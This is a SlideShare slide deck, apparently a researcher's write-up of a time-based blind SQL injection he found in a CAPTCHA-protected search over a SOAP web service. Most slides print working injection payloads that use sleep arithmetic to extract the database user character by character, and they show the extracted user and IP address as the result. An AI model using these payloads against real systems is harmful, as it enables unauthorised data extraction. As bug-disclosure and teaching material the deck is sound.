Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
detectify
Time based captcha protected
SQL injection through SOAP-webservice
Frans Rosén @fransrosen
detectify
Search + CAPTCHA
detectify
Search for Bobby: '
detectify
Search: '-sleep(5)-'
detectify
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976
detectify
Me need
1. Do	a	clear	PoC	–	get	data	
2. As	few	requests	as	possible	
3. Find	ALL	the	store	fronts!	
4. ???	
5. ...
detectify
user()
'-sleep((ascii(substring(user(),	1,	1))	-	90)	/	2)-'
detectify
user()
'-sleep((ascii(substring(user(),	1,	1))	-	90)	/	2)-'
(14*2)	+	90	=	118	==	v
detectify
Validate
'-(if(ascii(substring(user(),	1,	1))	=	117,	sleep(3),1))-			
		(if(ascii(substring(user(),	1,	1))	=	118...
detectify
Down on the @
'-sleep((ascii(substring(user(),	21,	1))	-	90)	/	2)-'
detectify
Host search
'-sleep((ascii(substring(user(),	21,	1))	-	46)	*	2)-'
detectify
Host search
0s	for	a	dot	
(T	-	4)	/	2
=	2
'-sleep((ascii(substring(user(),	21,	1))	-	46)	*	2)-'
detectify
Setup
detectify
Result
rawskuiumsal@192.251.68.254
detectify
Result
detectify
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQL	Inj...
detectify
Thanks!
Frans Rosén (@fransrosen) – www.detectify.com
Upcoming SlideShare
Loading in …5
×

Time based CAPTCHA protected SQL injection through SOAP-webservice

2,495 views

Published on

Here's a fun bug I found recently which made me do some serious optimization to gather the data due to the CAPTCHA inbetween.

Published in: Technology
  • Be the first to comment

Time based CAPTCHA protected SQL injection through SOAP-webservice

  1. 1. detectify Time based captcha protected SQL injection through SOAP-webservice Frans Rosén @fransrosen
  2. 2. detectify Search + CAPTCHA
  3. 3. detectify Search for Bobby: '
  4. 4. detectify Search: '-sleep(5)-'
  5. 5. detectify CAPTCHA… https://twitter.com/offensive_image/status/751191306500734976
  6. 6. detectify Me need 1. Do a clear PoC – get data 2. As few requests as possible 3. Find ALL the store fronts! 4. ??? 5. PROFIT!!!
  7. 7. detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
  8. 8. detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-' (14*2) + 90 = 118 == v
  9. 9. detectify Validate '-(if(ascii(substring(user(), 1, 1)) = 117, sleep(3),1))- (if(ascii(substring(user(), 1, 1)) = 118, sleep(6),1))- (if(ascii(substring(user(), 1, 1)) = 119, sleep(9),1))-' === v
  10. 10. detectify Down on the @ '-sleep((ascii(substring(user(), 21, 1)) - 90) / 2)-'
  11. 11. detectify Host search '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  12. 12. detectify Host search 0s for a dot (T - 4) / 2 = 2 '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  13. 13. detectify Setup
  14. 14. detectify Result rawskuiumsal@192.251.68.254
  15. 15. detectify Result
  16. 16. detectify Other https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf SQL Injection Optimization and Obfuscation Techniques
  17. 17. detectify Thanks! Frans Rosén (@fransrosen) – www.detectify.com

×